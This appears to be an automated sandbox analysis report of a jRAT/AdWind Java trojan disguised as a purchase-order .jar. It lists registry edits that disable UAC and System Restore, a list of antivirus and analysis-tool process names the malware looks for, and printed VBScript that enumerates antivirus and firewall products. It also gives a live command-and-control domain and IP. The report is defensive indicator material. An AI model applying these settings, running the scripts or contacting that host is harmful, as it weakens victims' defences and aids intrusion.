        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A93DFC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_73A93DFC
        Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Windows\SysWOW64\regedit.exe Registry value created: PromptOnSecureDesktop 0
        Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
        Source: C:\Windows\SysWOW64\regedit.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore DisableSR
        Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EMLPROXY.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKService.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fsgk32.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKProxy.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKTray.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMTray.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7RTScan.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FSMA32.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ONLINENT.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SCANWSCS.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERAntiSpyware.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7FWSrvc.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: guardxservice.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSecurity.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7PSSrvc.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSASCui.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: acs.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSMngr.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BullGuard.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wireshark.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: virusutilities.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7EmlPxy.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamTray.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMSvc.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procexp.exe
        Source: cscript.exe, 0000000B.00000003.1684085161.000000000333E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1684309240.0000000003342000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1684930666.0000000003343000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1683697790.0000000003359000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1684820314.0000000003585000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000002.1685492246.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1684796867.00000000035C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FPAVServer.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: mbam.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QUHLPSVC.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FProtTray.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamWin.exe
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: op_mon.exe
        Source: C:\Windows\SysWOW64\regedit.exe Registry value created: LowRiskFileTypes .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;
        Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
        Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

        Stealing of Sensitive Information

        Source: Yara match File source: 6.2.javaw.exe.73a90000.3.unpack, type: UNPACKEDPE
        Source: Yara match File source: 7.2.java.exe.a744bf4.11.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, type: DROPPED

        Remote Access Functionality

        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file:
            Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
            Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
            For Each objItem in colItems
                With objItem
                    WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
                End With
            Next
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file:
            Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
            Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
            For Each objItem in colItems
                With objItem
                    WScript.Echo "{""AV"":""" & .displayName & """}"
                End With
            Next
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file:
            Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
            Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
            For Each objItem in colItems
                With objItem
                    WScript.Echo "{""AV"":""" & .displayName & """}"
                End With
            Next
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file:
            Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
            Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
            For Each objItem in colItems
                With objItem
                    WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
                End With
            Next
        Source: Yara match File source: 6.2.javaw.exe.73a90000.3.unpack, type: UNPACKEDPE
        Source: Yara match File source: 7.2.java.exe.a744bf4.11.raw.unpack, type: UNPACKEDPE
        Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, type: DROPPED
        Source: _0.337891030941391956323023258775833856.class.6.dr Suspicious string: operational.JRat (in operational/Jrat.java)
        Source: krmyqqmohp.txt.5.dr Suspicious string: operational.JRat (in operational/Jrat.java)
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A911B0 _Java_com_Title_disableListener@8,6_2_73A911B0
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A91110 _Java_com_Title_enabletListener@8,SetWinEventHook,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,_wprintf,GetMessageW,6_2_73A91110
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 311 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 Inhibit System Recovery
        Credentials | Domains | Default Accounts | 2 Native API | 1 DLL Side-Loading | 1 Bypass User Account Control | 1 Obfuscated Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 11 Image File Execution Options Injection | 11 Image File Execution Options Injection | 1 Timestomp | Security Account Manager | 34 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 1 DLL Side-Loading | NTDS | 231 Security Software Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchd1
        Services File Permissions Weakness
        1
        Registry Run Keys / Startup Folder
        1
        Bypass User Account Control
        LSA Secrets2
        Process Discovery
        SSHKeylogging11
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
        Services File Permissions Weakness
        21
        Masquerading
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Modify Registry
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Services File Permissions Weakness
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Behavior Graph
        ID: 1427166
        Sample: NewOrder - P2D041197.jar
        Startdate: 17/04/2024
        Architecture: WINDOWS
        Score: 100

        Sample
          DNS/IP: pnauco5.ddns.net
            Signature: Uses dynamic DNS services
          Signature: Multi AV Scanner detection for domain / URL
          Signature: Malicious sample detected (through community Yara rule)
          Signature: Antivirus detection for dropped file
          Signature: 11 other signatures
          cmd.exe (started)
            Signature: Uses regedit.exe to modify the Windows registry
            java.exe (started)
              Dropped: C:\Users\user\zbrspjjraf.js, ASCII
              wscript.exe (started)
                Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                javaw.exe (started)
                  DNS/IP: pnauco5.ddns.net 103.151.123.225, 49739, 5000 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN unknown
                  DNS/IP: 127.0.0.1 unknown unknown
                  Dropped: C:\Users\...\Windows6471774156078736222.dll, PE32
                  Dropped: C:\...\mNuEFMHNfs1412424943545557855.reg, ASCII
                  Dropped: C:\Users\...\Retrive4614601071766058238.vbs, ASCII
                  Dropped: C:\Users\...\Retrive4410908985771939559.vbs, ASCII
                  Signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Signature: Excessive usage of taskkill to terminate processes
                  xcopy.exe (started)
                    Dropped: C:\Users\user\AppData\Roaming\...\zip.dll, PE32
                    Dropped: C:\Users\user\AppData\...\wsdetect.dll, PE32
                    Dropped: C:\Users\user\AppData\...\w2k_lsa_auth.dll, PE32
                    Dropped: 132 other malicious files
                    conhost.exe (started)
                  cmd.exe (started)
                    regedit.exe (started)
                      Signature: Creates an undocumented autostart registry key
                      Signature: Disables zone checking for all users
                      Signature: Creates a Image File Execution Options (IFEO) Debugger entry
                      Signature: 3 other signatures
                    conhost.exe (started)
                  java.exe (started)
                    Dropped: C:\Users\...\Retrive6937263458449411198.vbs, ASCII
                    Dropped: C:\Users\...\Retrive508991219844214216.vbs, ASCII
                    cmd.exe (started)
                      conhost.exe (started)
                      cscript.exe (started)
                    cmd.exe (started)
                      conhost.exe (started)
                      cscript.exe (started)
                    xcopy.exe (started)
                      conhost.exe (started)
                    conhost.exe (started)
                  26 other processes
                    conhost.exe (started)
                    27 other processes
              icacls.exe (started)
                conhost.exe (started)
            conhost.exe (started)

        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        --- | --- | --- | --- | ---
        C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs | 100% | Avira | VBS/Antiav.jre |
        C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs | 100% | Avira | VBS/Agent.281 |
        C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs | 100% | Avira | VBS/Agent.281 |
        C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll | 100% | Avira | TR/Spy.Agent.lusda |
        C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs | 100% | Avira | VBS/Antiav.jre |
        C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll | 86% | ReversingLabs | Win32.Trojan.AdWind |
        C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll | 80% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll | 0% | Virustotal | | Browse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll | 0% | Virustotal | | Browse
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        --- | --- | --- | --- | ---
        pnauco5.ddns.net | 5% | Virustotal | | Browse

        Source | Detection | Scanner | Label | Link
        --- | --- | --- | --- | ---
        http://java.sun.com/xml/dom/properties/ | 0% | URL Reputation | safe |
        http://java.sun.com/xml/stream/properties/ignore-external-dtd | 0% | URL Reputation | safe |
        http://bugreport.sun.com/bugreport/ | 0% | URL Reputation | safe |
        http://java.sun.com/xml/dom/properties/ancestor-check | 0% | URL Reputation | safe |
        http://javax.xml.XMLConstants/property/ | 0% | URL Reputation | safe |
        http://java.sun.com/xml/stream/properties/reader-in-defined-state | 0% | URL Reputation | safe |
        http://javax.xml.XMLConstants/property/accessExternalDTD | 0% | URL Reputation | safe |
        http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace | 0% | URL Reputation | safe |
        http://java.sun.com/xml/dom/properties/( | 0% | Virustotal | | Browse
        https://jrat.io | 7% | Virustotal | | Browse
        http://www.torchmobile.com/) | 1% | Virustotal | | Browse
        http://www.torchmobile.com/ | 0% | Virustotal | | Browse
        http://chasen.aist-nara.ac.jp/chasen/distribution.html | 0% | Virustotal | | Browse
        http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0 | 0% | Virustotal | | Browse

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        --- | --- | --- | --- | --- | ---
        pnauco5.ddns.net | 103.151.123.225 | true | true | | unknown

        Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                      high
                                                                                      http://apache.org/xml/features/validation/id-idref-checking/sun/Fjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/rober42539/lao-dictionaryxcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.lotus.com.xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://apache.org/xml/properties/validation/schema/root-type-definitiont(javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://apache.org/xml/properties/internal/namespace-binderjava.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://xml.org/sax/features/external-general-entitiesexjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://javax.xml.XMLConstants/property/accessExternalDTD;javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://apache.org/xml/properties/internal/stax-entity-resolverti=java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://apache.org/xml/properties/security-managerjavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://java.sun.com/xml/dom/properties/ancestor-checkjavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.torchmobile.com/)xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                                          http://xml.org/sax/features/namespace-prefixesna(javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://apache.org/xml/features/xincludejavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://creativecommons.org/licenses/xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.unicode.org/copyright.htmlxcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://mozilla.org/MPL/2.0/.xcopy.exe, 00000015.00000003.1742230987.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://apache.org/xml/properties/internal/xinclude-handler9javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://apache.org/xml/features/validation/schema-full-checkingjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://javax.xml.XMLConstants/property/javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://musicbrainz.orgxcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://apache.org/xml/features/validation/warn-on-duplicate-attdef/xni/XDjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://jrat.iojava.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalseunknown
